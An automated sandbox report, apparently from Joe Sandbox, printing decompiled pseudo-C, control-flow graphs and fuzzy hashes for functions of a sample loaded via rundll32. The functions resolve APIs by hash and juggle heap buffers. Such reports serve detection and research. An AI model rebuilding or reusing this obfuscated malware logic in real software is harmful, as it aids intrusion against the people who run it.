				E0000017B17B359E908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t199 == 0) goto 0x359e6fea;
				 *_t199();
				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0x359e7010;
				HeapFree(_t260, ??);
				HeapFree(??, ??, ??);
				goto 0x359e7040;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				if (0x57 != 0) goto 0x359e723e;
				if (E0000017B17B359E91C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x359e7239;
				_t96 = E0000017B17B359E672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
				_t123 =  *((intOrPtr*)(_t272 + 0x98));
				if (_t96 != 0) goto 0x359e70a8;
				if (_t123 == 0) goto 0x359e7239;
				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
				if (E0000017B17B359E91C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x359e7166;
				_t46 = _t199 + 0x10; // 0x10
				_t116 = _t46;
				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
				E0000017B17B359E908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t199 == 0) goto 0x359e7109;
				 *_t199();
				r8d = _t156;
				0x359e47b0();
				if (_t156 - _t116 >= 0) goto 0x359e7134;
				r8d = _t116 - _t156;
				E0000017B17B359E487A();
				E0000017B17B359E908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t199 == 0) goto 0x359e714e;
				 *_t199();
				HeapFree(??, ??, ??);
				_t269 =  *((intOrPtr*)(_t272 + 0x88));
				r14d = r14d ^ 0x1a1a0866;
				if (E0000017B17B359E91C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x359e723e;
				if (E0000017B17B359E672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0x359e723e;
				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0x359e723e;
				E0000017B17B359E908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t199 == 0) goto 0x359e71de;
				 *_t199();
				E0000017B17B359E908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t199 == 0) goto 0x359e71f8;
				 *_t199();
				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
				 *((long long*)(_t272 + 0x28)) = _t201;
				 *((long long*)(_t253 + 0x30)) = _t201;
				E0000017B17B359E908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t201 == 0) goto 0x359e723e;
				 *_t201();
				goto 0x359e723e;
				goto 0x359e7040;
				return 1;
			}
































                                0x17b359e6df0
                                0x17b359e6df3
                                0x17b359e6df7
                                0x17b359e6e06
                                0x17b359e6e11
                                0x17b359e6e22
                                0x17b359e6e36
                                0x17b359e6e42
                                0x17b359e6e54
                                0x17b359e6e5b
                                0x17b359e6e63
                                0x17b359e6e6b
                                0x17b359e6e75
                                0x17b359e6e7e
                                0x17b359e6e86
                                0x17b359e6e8b
                                0x17b359e6e8d
                                0x17b359e6e98
                                0x17b359e6e9d
                                0x17b359e6ea6
                                0x17b359e6eae
                                0x17b359e6ebd
                                0x17b359e6ec9
                                0x17b359e6ed4
                                0x17b359e6eda
                                0x17b359e6edc
                                0x17b359e6edf
                                0x17b359e6ee5
                                0x17b359e6ef2
                                0x17b359e6efa
                                0x17b359e6eff
                                0x17b359e6f01
                                0x17b359e6f05
                                0x17b359e6f0f
                                0x17b359e6f0f
                                0x17b359e6f17
                                0x17b359e6f25
                                0x17b359e6f2a
                                0x17b359e6f32
                                0x17b359e6f37
                                0x17b359e6f39
                                0x17b359e6f3c
                                0x17b359e6f40
                                0x17b359e6f44
                                0x17b359e6f4b
                                0x17b359e6f4d
                                0x17b359e6f50
                                0x17b359e6f56
                                0x17b359e6f5b
                                0x17b359e6f60
                                0x17b359e6f62
                                0x17b359e6f67
                                0x17b359e6f70
                                0x17b359e6f72
                                0x17b359e6f80
                                0x17b359e6f8f
                                0x17b359e6f9f
                                0x17b359e6fa6
                                0x17b359e6fb5
                                0x17b359e6fb9
                                0x17b359e6fbd
                                0x17b359e6fc5
                                0x17b359e6fc7
                                0x17b359e6fcb
                                0x17b359e6fd9
                                0x17b359e6fe1
                                0x17b359e6fe8
                                0x17b359e6fed
                                0x17b359e6ffc
                                0x17b359e700a
                                0x17b359e701f
                                0x17b359e702d
                                0x17b359e704d
                                0x17b359e7055
                                0x17b359e707b
                                0x17b359e7090
                                0x17b359e7095
                                0x17b359e709e
                                0x17b359e70a2
                                0x17b359e70ab
                                0x17b359e70cb
                                0x17b359e70db
                                0x17b359e70db
                                0x17b359e70eb
                                0x17b359e70f8
                                0x17b359e7100
                                0x17b359e7107
                                0x17b359e7112
                                0x17b359e7117
                                0x17b359e711e
                                0x17b359e712c
                                0x17b359e712f
                                0x17b359e713d
                                0x17b359e7145
                                0x17b359e714c
                                0x17b359e7158
                                0x17b359e715e
                                0x17b359e7166
                                0x17b359e7189
                                0x17b359e71a5
                                0x17b359e71b4
                                0x17b359e71cd
                                0x17b359e71d5
                                0x17b359e71dc
                                0x17b359e71e7
                                0x17b359e71ef
                                0x17b359e71f6
                                0x17b359e720c
                                0x17b359e720f
                                0x17b359e7214
                                0x17b359e721c
                                0x17b359e7224
                                0x17b359e722b
                                0x17b359e722d
                                0x17b359e7234
                                0x17b359e7257

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: 61b19465f11731e083c075869b8d134122826b945a78642a6a105bb0dd7d5bae
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 89C18D3220DB8195EB65DB7AE8843DA63B0FF88B84F6846259E8D47786DF38C5C5C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E5638 Relevance: 11.5, APIs: 9, Instructions: 252memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 395 17b359e5638-17b359e5687 call 17b359e908c 398 17b359e5689-17b359e568c 395->398 399 17b359e5691-17b359e56a2 call 17b359e908c 395->399 398->399 402 17b359e56a4 399->402 403 17b359e56ab-17b359e56eb call 17b359e5ba4 call 17b359e13ec 399->403 402->403 408 17b359e56f1-17b359e5706 call 17b359e908c 403->408 409 17b359e59e0-17b359e59f9 403->409 412 17b359e5708-17b359e570f 408->412 413 17b359e5711 408->413 414 17b359e5713-17b359e5722 call 17b359e908c 412->414 413->414 418 17b359e5724-17b359e572c 414->418 419 17b359e572e 414->419 420 17b359e5731-17b359e5747 HeapAlloc 418->420 419->420 422 17b359e59d2-17b359e59da HeapFree 420->422 423 17b359e574d-17b359e576b call 17b359e47b0 420->423 422->409 426 17b359e57a3-17b359e57ba call 17b359ea238 423->426 427 17b359e576d-17b359e5774 423->427 432 17b359e59c4-17b359e59cc HeapFree 426->432 433 17b359e57c0-17b359e57e1 call 17b359e908c 426->433 427->426 429 17b359e5776-17b359e579e call 17b359e47b0 * 2 427->429 429->426 432->422 438 17b359e57ea 433->438 439 17b359e57e3-17b359e57e8 433->439 440 17b359e57ec-17b359e580b HeapAlloc 438->440 439->440 442 17b359e59b6 440->442 443 17b359e5811-17b359e584c call 17b359e5ba4 call 17b359e13ec 440->443 444 17b359e59b9-17b359e59be HeapFree 442->444 449 17b359e59a8-17b359e59b0 HeapFree 443->449 450 17b359e5852-17b359e5893 call 17b359eb158 HeapFree 443->450 444->432 449->442 453 17b359e5899-17b359e58a2 450->453 454 17b359e59fa-17b359e59ff 450->454 453->454 455 17b359e58a8-17b359e58c7 call 17b359e7cf4 453->455 454->432 455->449 458 17b359e58cd-17b359e58ee HeapAlloc 455->458 459 17b359e59a3 458->459 460 17b359e58f4-17b359e5931 call 17b359e5ba4 call 17b359e13ec 458->460 459->449 465 17b359e5995-17b359e599d HeapFree 460->465 466 17b359e5933-17b359e5993 call 17b359eb158 * 2 460->466 465->459 466->444
                                C-Code - Quality: 15%
                                			E0000017B17B359E5638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
				void* __rbp;
				signed long long _t89;
				signed long long _t109;
				signed long long _t122;
				signed long long _t131;
				intOrPtr _t141;
				void* _t167;
				void* _t186;
				long long* _t187;
				long long _t188;
				long long _t190;
				long long _t192;
				long long* _t193;
				long long* _t234;
				long _t237;
				long _t240;
				void* _t243;
				void* _t248;
				void* _t249;
				void* _t264;
				void* _t269;
				void* _t270;
				long _t273;
				long _t277;
				void* _t281;

				_t269 = __r11;
				_t192 = __rbx;
				_t186 = _t248;
				 *((long long*)(_t186 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
				 *((long long*)(_t186 + 0x18)) = __r8;
				 *((long long*)(_t186 + 8)) = __rcx;
				_t249 = _t248 - 0x50;
				_t244 =  *0x359ed458;
				_t187 =  *0x359ed448;
				 *((long long*)(_t249 + 0x38)) = _t187;
				E0000017B17B359E908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t187 == _t237) goto 0x359e5691;
				_t9 = _t237 + 0xa; // 0xa
				 *_t187();
				E0000017B17B359E908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t187 == _t237) goto 0x359e56ab;
				 *_t187();
				_t12 = _t249 + 0x30; // -126
				_t89 = E0000017B17B359E5BA4(_t12);
				_t13 = _t249 + 0x30; // -126
				r11d = _t89;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t18 = _t269 + 3; // 0x3
				E0000017B17B359E13EC(_t18, _t187, __rbx, _t13);
				 *((long long*)(_t249 + 0x40)) = _t187;
				if (_t187 == _t237) goto 0x359e59e0;
				r12d = 0xfb849f8f;
				E0000017B17B359E908C(r12d, _t187,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t187 == _t237) goto 0x359e5711;
				 *_t187();
				goto 0x359e5713;
				E0000017B17B359E908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
				if (_t187 == _t237) goto 0x359e572e;
				r13d =  *_t187();
				goto 0x359e5731;
				r13d = 0;
				_t23 = _t192 + 7; // 0x7
				r8d = _t273 + _t23;
				HeapAlloc(_t281, _t277, _t273);
				if (_t187 == _t237) goto 0x359e59d2;
				_t24 = _t192 + 1; // 0x1
				r8d = _t24;
				0x359e47b0();
				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x359e57a3;
				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0x359e57a3;
				_t188 =  *((intOrPtr*)(_t249 + 0x38));
				r8d = 6;
				0x359e47b0();
				_t32 = _t273 + 1; // 0x1
				r8d = _t32;
				0x359e47b0();
				_t234 = _t187;
				if (E0000017B17B359EA238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0x359e59c4;
				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
				E0000017B17B359E908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
				if (_t188 == _t237) goto 0x359e57ea;
				 *_t188();
				goto 0x359e57ec;
				 *((intOrPtr*)(_t193 + 0x10)) = 0;
				_t41 = _t234 + 0x34; // 0x34
				r8d = _t41;
				 *((intOrPtr*)(_t193 + 0x14)) = 1;
				HeapAlloc(_t270, _t237, _t240);
				if (_t188 == _t237) goto 0x359e59b6;
				_t43 = _t249 + 0x30; // 0xfb849fcf
				_t109 = E0000017B17B359E5BA4(_t43);
				_t44 = _t249 + 0x30; // 0xfb849fcf
				r11d = _t109;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t49 = _t269 + 3; // 0x3
				E0000017B17B359E13EC(_t49, _t188, _t193, _t44);
				if (_t188 == _t237) goto 0x359e59a8;
				0x359eb158();
				HeapFree(_t243, ??);
				 *((long long*)(_t193 + 8)) = _t188;
				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x359e59fa;
				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
				if (_t141 == 0) goto 0x359e59fa;
				r8d = _t141;
				_t190 = _t193 + 0x28;
				 *((long long*)(_t249 + 0x20)) = _t190;
				if (E0000017B17B359E7CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0x359e59a8;
				r15d = 0x77;
				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
				HeapAlloc(??, ??, ??);
				if (_t190 == _t237) goto 0x359e59a3;
				_t62 = _t249 + 0x30; // 0xfb849fcf
				_t122 = E0000017B17B359E5BA4(_t62);
				_t63 = _t249 + 0x30; // 0xfb849fcf
				r11d = _t122;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t68 = _t269 + 3; // 0x3
				_t131 = E0000017B17B359E13EC(_t68, _t190, _t193, _t63);
				 *((long long*)(_t249 + 0x48)) = _t190;
				if (_t190 == _t237) goto 0x359e5995;
				0x359eb158();
				r11d = _t131;
				r15d = r15d - r11d;
				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x17b359f129f;
				0x359eb158();
				 *((long long*)(_t193 + 0x20)) = _t190;
				goto 0x359e59b9;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return 2;
			}




























                                0x17b359e5638
                                0x17b359e5638
                                0x17b359e5638
                                0x17b359e563b
                                0x17b359e563f
                                0x17b359e5643
                                0x17b359e5647
                                0x17b359e5656
                                0x17b359e565a
                                0x17b359e5661
                                0x17b359e5678
                                0x17b359e567f
                                0x17b359e5687
                                0x17b359e568c
                                0x17b359e568f
                                0x17b359e569a
                                0x17b359e56a2
                                0x17b359e56a9
                                0x17b359e56ab
                                0x17b359e56b0
                                0x17b359e56b5
                                0x17b359e56ba
                                0x17b359e56d4
                                0x17b359e56d7
                                0x17b359e56db
                                0x17b359e56e3
                                0x17b359e56eb
                                0x17b359e56f5
                                0x17b359e56fe
                                0x17b359e5706
                                0x17b359e570b
                                0x17b359e570f
                                0x17b359e571a
                                0x17b359e5722
                                0x17b359e5729
                                0x17b359e572c
                                0x17b359e572e
                                0x17b359e5731
                                0x17b359e5731
                                0x17b359e573b
                                0x17b359e5747
                                0x17b359e574d
                                0x17b359e574d
                                0x17b359e5757
                                0x17b359e576b
                                0x17b359e5774
                                0x17b359e5776
                                0x17b359e577b
                                0x17b359e578d
                                0x17b359e5792
                                0x17b359e5792
                                0x17b359e579e
                                0x17b359e57b0
                                0x17b359e57ba
                                0x17b359e57c0
                                0x17b359e57d2
                                0x17b359e57d9
                                0x17b359e57e1
                                0x17b359e57e6
                                0x17b359e57e8
                                0x17b359e57f1
                                0x17b359e57f4
                                0x17b359e57f4
                                0x17b359e57f8
                                0x17b359e57ff
                                0x17b359e580b
                                0x17b359e5811
                                0x17b359e5816
                                0x17b359e581b
                                0x17b359e5820
                                0x17b359e583a
                                0x17b359e583d
                                0x17b359e5841
                                0x17b359e584c
                                0x17b359e5871
                                0x17b359e587e
                                0x17b359e588c
                                0x17b359e5893
                                0x17b359e5899
                                0x17b359e58a2
                                0x17b359e58a8
                                0x17b359e58b3
                                0x17b359e58bb
                                0x17b359e58c7
                                0x17b359e58cd
                                0x17b359e58db
                                0x17b359e58e2
                                0x17b359e58ee
                                0x17b359e58f4
                                0x17b359e58f9
                                0x17b359e58fe
                                0x17b359e5903
                                0x17b359e591d
                                0x17b359e5920
                                0x17b359e5924
                                0x17b359e5929
                                0x17b359e5931
                                0x17b359e5950
                                0x17b359e595d
                                0x17b359e5968
                                0x17b359e5970
                                0x17b359e5980
                                0x17b359e598a
                                0x17b359e5993
                                0x17b359e599d
                                0x17b359e59b0
                                0x17b359e59be
                                0x17b359e59cc
                                0x17b359e59da
                                0x17b359e59f9

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: e23852087a02b3e6f0ad76bebb6feafcec778411056e6515273cf04e4c8754a0
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: DBA18D3621CA8086DB15DB3AE4803DE67B2FBC9B84FA44611EE4E87B55DF38C9D58740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E7FD4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 170memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 542 17b359e7fd4-17b359e8011 543 17b359e8017-17b359e801c 542->543 544 17b359e80ef-17b359e80f6 542->544 545 17b359e8115-17b359e8118 543->545 546 17b359e8022-17b359e8027 543->546 547 17b359e814a 544->547 548 17b359e80f8-17b359e8109 call 17b359e908c 544->548 550 17b359e811a-17b359e811d 545->550 551 17b359e80bf-17b359e80c4 545->551 552 17b359e80e9 546->552 553 17b359e802d-17b359e8032 546->553 554 17b359e814f-17b359e8152 547->554 561 17b359e8139 548->561 562 17b359e810b-17b359e8113 548->562 556 17b359e8120 call 17b359e85cc 550->556 557 17b359e821b-17b359e8224 551->557 552->544 558 17b359e81c8-17b359e81cf 553->558 559 17b359e8038-17b359e803d 553->559 554->557 560 17b359e8158-17b359e815e 554->560 565 17b359e8125-17b359e812b 556->565 563 17b359e8226-17b359e822c 557->563 564 17b359e8241-17b359e825b 557->564 568 17b359e81d1-17b359e81f9 call 17b359e2874 HeapFree 558->568 569 17b359e81fb 558->569 566 17b359e8043-17b359e8048 559->566 567 17b359e8164-17b359e816c 559->567 560->557 560->567 578 17b359e813e-17b359e8148 561->578 562->578 563->564 573 17b359e822e-17b359e8239 563->573 574 17b359e80b5-17b359e80ba 565->574 575 17b359e812d-17b359e8134 565->575 576 17b359e80c9-17b359e80da call 17b359e908c 566->576 577 17b359e804a-17b359e804f 566->577 570 17b359e81be-17b359e81c6 567->570 571 17b359e816e-17b359e8171 567->571 572 17b359e8200-17b359e8203 568->572 569->572 570->557 570->558 571->570 580 17b359e8173-17b359e818f call 17b359e487a 571->580 572->557 581 17b359e8205-17b359e8212 572->581 583 17b359e823c call 17b359e6ac0 573->583 574->557 585 17b359e807a-17b359e808a 575->585 597 17b359e80e2-17b359e80e4 576->597 598 17b359e80dc 576->598 586 17b359e8051-17b359e8056 577->586 587 17b359e805b-17b359e805e 577->587 578->554 602 17b359e8192 call 17b359e5448 580->602 591 17b359e8214 call 17b359e9214 581->591 583->564 589 17b359e808d call 17b359e14b8 585->589 586->557 587->551 593 17b359e8060-17b359e8063 587->593 594 17b359e8092-17b359e8096 589->594 596 17b359e8219 591->596 599 17b359e8066 call 17b359e85cc 593->599 600 17b359e8098-17b359e809d 594->600 601 17b359e80a2-17b359e80b0 HeapFree 594->601 596->557 597->557 598->597 603 17b359e806b-17b359e8071 599->603 600->557 601->557 604 17b359e8197-17b359e8199 602->604 603->574 605 17b359e8073 603->605 606 17b359e819b-17b359e81ac call 17b359e672c 604->606 607 17b359e81bc 604->607 605->585 606->570 610 17b359e81ae-17b359e81b7 606->610 607->570 610->607
                                C-Code - Quality: 46%
                                			E0000017B17B359E7FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
				void* __rdi;
				signed int _t34;
				void* _t66;
				char* _t104;
				void* _t131;
				char* _t134;
				long long _t140;
				void* _t141;
				void* _t143;
				void* _t144;
				signed long long _t156;
				void* _t158;

				_t106 = __rbx;
				_t104 = __rax;
				 *((long long*)(_t143 + 8)) = __rbx;
				 *((long long*)(_t143 + 0x18)) = _t140;
				 *((long long*)(_t143 + 0x20)) = __rsi;
				_t144 = _t143 - 0x40;
				r14d =  *0x359ed450;
				_t141 = __rcx;
				_t137 =  *((intOrPtr*)( *0x359ed458 + 8));
				r12d = 0;
				_t34 = r14d ^ __edx;
				if (_t34 == 0x139d2b8d) goto 0x359e80ef;
				if (_t34 == 0x15f5a8c2) goto 0x359e8115;
				if (_t34 == 0x2f77acf9) goto 0x359e80e9;
				if (_t34 == 0x48e12436) goto 0x359e81c8;
				if (_t34 == 0x4d382929) goto 0x359e8164;
				if (_t34 == 0xb016dc39) goto 0x359e80c9;
				if (_t34 == 0xb057dfc9) goto 0x359e805b;
				goto 0x359e821b;
				if (r9d == 0) goto 0x359e80bf;
				E0000017B17B359E85CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0x359ed458 + 8)), _t158);
				if (_t104 == 0) goto 0x359e80b5;
				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
				if (E0000017B17B359E14B8(_t104, _t106, _t141, 0x17b359e34a4,  *((intOrPtr*)( *0x359ed458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0x359e80a2;
				goto 0x359e821b;
				HeapFree(_t131, ??);
				goto 0x359e821b;
				goto 0x359e821b;
				goto 0x359e821b;
				E0000017B17B359E908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0x359ed458 + 8)) + 0x18)));
				if (_t104 == 0) goto 0x359e80e2;
				 *_t104();
				goto 0x359e821b;
				r12d = 1;
				if ( *(_t141 + 0x50) == 0) goto 0x359e814a;
				E0000017B17B359E908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
				if (_t104 == 0) goto 0x359e8139;
				 *_t104();
				goto 0x359e813e;
				if (r9d == 0) goto 0x359e80bf;
				E0000017B17B359E85CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0x359ed458 + 8)), _t156);
				_t134 = _t104;
				if (_t104 == 0) goto 0x359e80b5;
				goto 0x359e807a;
				asm("sbb ebx, ebx");
				goto 0x359e814f;
				if (r12d == 0) goto 0x359e821b;
				if (0x426 != 0x426) goto 0x359e821b;
				if (_t134 == 0) goto 0x359e81be;
				if ( *_t134 == 0) goto 0x359e81be;
				E0000017B17B359E487A();
				if (E0000017B17B359E5448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0x359e81bc;
				if (E0000017B17B359E672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0x359e81be;
				asm("ror ax, 0x8");
				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
				r12d = 1;
				if (0 != 0) goto 0x359e821b;
				if ( *(_t141 + 0x50) == 0) goto 0x359e81fb;
				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
				E0000017B17B359E2874( *((intOrPtr*)( *0x359ed458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
				HeapFree(??, ??, ??);
				goto 0x359e8200;
				if (r12d == 0) goto 0x359e821b;
				_t27 = _t144 + 0x30; // 0x31
				_t66 = E0000017B17B359E9214( *((intOrPtr*)( *0x359ed458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0x359e8241;
				if (_t66 == 0x3e5) goto 0x359e8241;
				r8d = _t66;
				E0000017B17B359E6AC0( *0x359ed458,  *((intOrPtr*)( *0x359ed458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
				return _t66;
			}















                                0x17b359e7fd4
                                0x17b359e7fd4
                                0x17b359e7fd4
                                0x17b359e7fd9
                                0x17b359e7fde
                                0x17b359e7fe8
                                0x17b359e7fec
                                0x17b359e7ff3
                                0x17b359e7ffd
                                0x17b359e8004
                                0x17b359e8007
                                0x17b359e8011
                                0x17b359e801c
                                0x17b359e8027
                                0x17b359e8032
                                0x17b359e803d
                                0x17b359e8048
                                0x17b359e804f
                                0x17b359e8056
                                0x17b359e805e
                                0x17b359e8066
                                0x17b359e8071
                                0x17b359e8082
                                0x17b359e8096
                                0x17b359e809d
                                0x17b359e80aa
                                0x17b359e80b0
                                0x17b359e80ba
                                0x17b359e80c4
                                0x17b359e80d2
                                0x17b359e80da
                                0x17b359e80e0
                                0x17b359e80e4
                                0x17b359e80e9
                                0x17b359e80f6
                                0x17b359e8101
                                0x17b359e8109
                                0x17b359e8111
                                0x17b359e8113
                                0x17b359e8118
                                0x17b359e8120
                                0x17b359e8125
                                0x17b359e812b
                                0x17b359e8134
                                0x17b359e8140
                                0x17b359e8148
                                0x17b359e8152
                                0x17b359e815e
                                0x17b359e816c
                                0x17b359e8171
                                0x17b359e8185
                                0x17b359e8199
                                0x17b359e81ac
                                0x17b359e81b3
                                0x17b359e81b7
                                0x17b359e81be
                                0x17b359e81c6
                                0x17b359e81cf
                                0x17b359e81d1
                                0x17b359e81e4
                                0x17b359e81f1
                                0x17b359e81f9
                                0x17b359e8203
                                0x17b359e820d
                                0x17b359e8219
                                0x17b359e8224
                                0x17b359e822c
                                0x17b359e8236
                                0x17b359e823c
                                0x17b359e825b

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: 2df318bd7a24e02da79bc4e5879e4a7f0f4168eb6955912eaef4f33b3fe1468b
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 7061603120CB8185FB659AFA99D03EA52B1BF847C4F784265EE4D4B7D6DF28C8C58380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E1BFC Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 216memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 471 17b359e1bfc-17b359e1c41 472 17b359e1c4a-17b359e1c5b call 17b359e908c 471->472 473 17b359e1c43-17b359e1c45 call 17b359e47b8 471->473 477 17b359e1c63-17b359e1c6d 472->477 478 17b359e1c5d 472->478 473->472 479 17b359e1c6f-17b359e1c80 477->479 480 17b359e1cdd-17b359e1ce4 477->480 478->477 482 17b359e1c94 479->482 483 17b359e1c82-17b359e1c85 479->483 481 17b359e1ceb-17b359e1cfc call 17b359e908c 480->481 491 17b359e1d09-17b359e1d0c 481->491 492 17b359e1cfe-17b359e1d03 481->492 487 17b359e1c97-17b359e1c9a 482->487 485 17b359e1c87-17b359e1c8e 483->485 486 17b359e1c90-17b359e1c92 483->486 485->483 485->486 486->482 486->487 489 17b359e1caf-17b359e1cb4 487->489 490 17b359e1c9c-17b359e1ca0 487->490 494 17b359e1cb6 call 17b359e240c 489->494 490->489 493 17b359e1ca2-17b359e1ca6 490->493 495 17b359e1ed1 491->495 496 17b359e1d12-17b359e1d3c 491->496 492->491 493->489 497 17b359e1ca8-17b359e1cac 493->497 498 17b359e1cbb-17b359e1cc1 494->498 500 17b359e1ed6-17b359e1eef 495->500 501 17b359e1d40 call 17b359e5168 496->501 497->489 498->480 499 17b359e1cc3-17b359e1cdb 498->499 499->481 502 17b359e1d45-17b359e1d49 501->502 503 17b359e1ec1-17b359e1ecf HeapFree 502->503 504 17b359e1d4f-17b359e1d6f call 17b359e908c 502->504 503->500 507 